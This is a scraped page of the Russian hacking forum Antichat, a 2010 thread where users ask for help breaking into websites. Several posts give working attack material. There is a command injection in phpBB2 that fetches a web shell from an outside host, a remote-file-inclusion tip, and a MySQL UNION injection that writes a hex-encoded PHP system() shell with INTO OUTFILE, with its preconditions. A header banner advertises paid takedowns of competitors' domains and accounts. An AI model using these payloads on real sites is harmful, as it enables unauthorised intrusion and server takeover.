Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1145 из 1393

1145

Опции темы

Поиск в этой теме

Опции просмотра

#11441

01.02.2010, 13:08

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Возможно ли перевести SSI из режима NoExec в обычный(с екзеком) при помощи htaccess? Где вообще эта опция задается? в httpd.conf? На apache.org(http://httpd.apache.org/docs/2.0/mod/mod_include.html) я не нашел инфы нормальной.

#11442

01.02.2010, 13:23

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Отправить сообщение для Root-access с помощью ICQ

Цитата:

Сообщение от попугай

NoExec вводится с помощью добавления опции IncludesNOEXEC, но не Includes. Таким образом, чтобы включить Exec, надо переписать .htaccess:

Код:

AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
Options +Includes

#11443

01.02.2010, 13:31

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Root-access

Код:

AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
Options +Includes

Естественно, htaccess создан был. Выполняются все директивы SSI, кроме exec, которая была заблокирована в httpd.conf. Щас погуглил еще немного, и допёр, что видимо в httpd.conf установлен noexec и переопределить его видимо нельзя.

#11444

02.02.2010, 16:57

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

вот собсно вопрос про PostgreSQL:

можно добавить новую таблицу аааа и колонку b типа

Цитата:

id=27;CREATE TABLE аааа (b text);--

но
как добавить несколько колонок сразу на эту таблицу и можно ли добавит новую колонку на уже существуюшую таблицу.
Права на создание таблиц есть

#11445

02.02.2010, 17:21

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

Сообщение от YuNi|[c

вот собсно вопрос про PostgreSQL:

можно добавить новую таблицу аааа и колонку b типа
но
как добавить несколько колонок сразу на эту таблицу и можно ли добавит новую колонку на уже существуюшую таблицу.
Права на создание таблиц есть

http://www.postgresql.org/docs/8.1/static/sql-createtable.html
http://www.postgresql.org/docs/8.1/static/sql-altertable.html

__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

#11446

03.02.2010, 00:58

~~F4R~~

Banned

Регистрация: 20.06.2008

Сообщений: 296

Провел на форуме:
1385078

Репутация: 126

Отправить сообщение для F4R с помощью ICQ

profile.php?mode=editprofile&cmd=GET%20http://site.com/sh.txt%20>%20sh.php

получил смд
пытаюсь так залить. шел в пхпбб2
но файл не создаётся в чём трабла?

#11447

03.02.2010, 09:35

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

Цитата:

Сообщение от F4R

какая ос?

#11448

03.02.2010, 12:35

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от F4R

если allow_url_include On , то залей include($_GET[lol]); , и profile.php?mode=editprofile&lol=http://site.com/sh.txt , или пробуй через аватарки, _http://forum.antichat.ru/showpost.php?p=198446&postcount=3

#11449

03.02.2010, 15:16

$ereg@

Познающий

Регистрация: 21.08.2008

Сообщений: 85

Провел на форуме:
298650

Репутация: 15

Отправить сообщение для $ereg@ с помощью ICQ

вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
теперь пробую залить шелл, делаю запрос :
-999+union+select+1,2,0x3c3f206563686f205c223c70726 53e5c223b4073797374656d28245f4745545b5c22636d645c2 25d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+ INTO+OUTFILE+'/var/www/bans/z.php'--

В ответ получаю ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1

пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
опытные кулхацкеры подскажите ламеру чё делать

#11450

03.02.2010, 16:57

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от $ereg@

Для того чтобы залился нужно:

1. magic_quotes_gpc = Off
2. file_priv Y
3. папка, доступная на запись

в поле, где выводятся цифры, напиши 's' , если вывелось s - magic_quotes_gpc = off.

делаешь запрос - ....from mysql.user where user= 'username' , username берёшь с того, что выводит user()

ну и нужно найти диру, в которую шелл загрузишь

_http://forum.antichat.ru/thread104591.html , см Вопрос №7

Страница 1145 из 1393

1145

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход